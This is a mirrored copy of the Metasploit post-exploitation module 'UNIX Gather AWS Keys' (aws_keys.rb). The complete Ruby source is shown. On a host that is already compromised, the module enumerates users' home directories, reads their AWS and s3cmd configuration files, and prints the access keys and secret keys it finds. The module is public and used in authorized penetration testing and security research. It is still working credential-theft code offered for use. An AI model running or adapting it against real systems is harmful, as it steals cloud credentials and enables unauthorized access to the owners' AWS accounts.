Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/aws_keys.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  AWS_KEY = 'AWS_ACCESS_KEY_ID'

11
  AWS_SECRET = 'AWS_SECRET_ACCESS_KEY'

12
  S3_KEY = 'access_key'

13
  S3_SECRET = 'secret_key'

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'UNIX Gather AWS Keys',

20
        'Description' => %q{

21
          This module will attempt to read AWS configuration files

22
          (.aws/config, .aws//credentials and .s3cfg) for users discovered

23
          on the session'd system and extract AWS keys from within.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],

27
        'Platform' => ['linux', 'osx', 'unix', 'solaris', 'bsd'],

28
        'SessionTypes' => %w[shell meterpreter],

29
        'References' => [

30
          [ 'URL', 'http://s3tools.org/kb/item14.htm' ],

31
          [ 'URL', 'http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files' ]

32
        ],

33
        'Notes' => {

34
          'Stability' => [CRASH_SAFE],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40
  end

41


42
  def get_aws_keys(config_file)

43
    keys_data = []

44
    unless readable? config_file

45
      vprint_error("Couldn't read #{config_file}")

46
      return []

47
    end

48
    config_s = read_file(config_file)

49
    return keys_data if config_s.empty?

50


51
    aws_config = Rex::Parser::Ini.from_s(config_s)

52
    aws_config.each_key do |profile|

53
      # XXX: Ini assumes anything on either side of the = is the key and value

54
      # including spaces, so we need to fix this

55
      profile_config = Hash[aws_config[profile].map { |k, v| [ k.strip, v.strip ] }]

56
      aws_access_key_id = nil

57
      aws_secret_access_key = nil

58
      profile_config.each_pair do |key, value|

59
        if key == AWS_KEY.downcase || key == S3_KEY

60
          aws_access_key_id = value

61
        end

62


63
        if key == AWS_SECRET.downcase || key == S3_SECRET

64
          aws_secret_access_key = value

65
        end

66
      end

67
      next unless aws_access_key_id || aws_secret_access_key

68


69
      keys_data << [ config_file, aws_access_key_id, aws_secret_access_key, profile ]

70
    end

71


72
    keys_data

73
  end

74


75
  def get_keys_from_files

76
    keys_data = []

77
    vprint_status('Enumerating possible user AWS config files')

78
    # build up a list of aws configuration files to read, including the

79
    # configuration files that may exist (rare)

80
    enum_user_directories.map do |user_dir|

81
      vprint_status("Looking for AWS config/credentials files in #{user_dir}")

82
      %w[.aws/config .aws/credentials .s3cfg].each do |possible_key_file|

83
        this_key_data = get_aws_keys(::File.join(user_dir, possible_key_file))

84
        next if this_key_data.empty?

85


86
        keys_data <<= this_key_data.flatten

87
      end

88
    end

89
    keys_data

90
  end

91


92
  def run

93
    keys_data = get_keys_from_files

94
    return if keys_data.empty?

95


96
    keys_table = Rex::Text::Table.new(

97
      'Header' => 'AWS Key Data',

98
      'Columns' => [ 'Source', AWS_KEY, AWS_SECRET, 'Profile' ]

99
    )

100


101
    keys_data.each do |key_data|

102
      keys_table << key_data

103
    end

104


105
    print_line(keys_table.to_s)

106
  end

107
end

108


109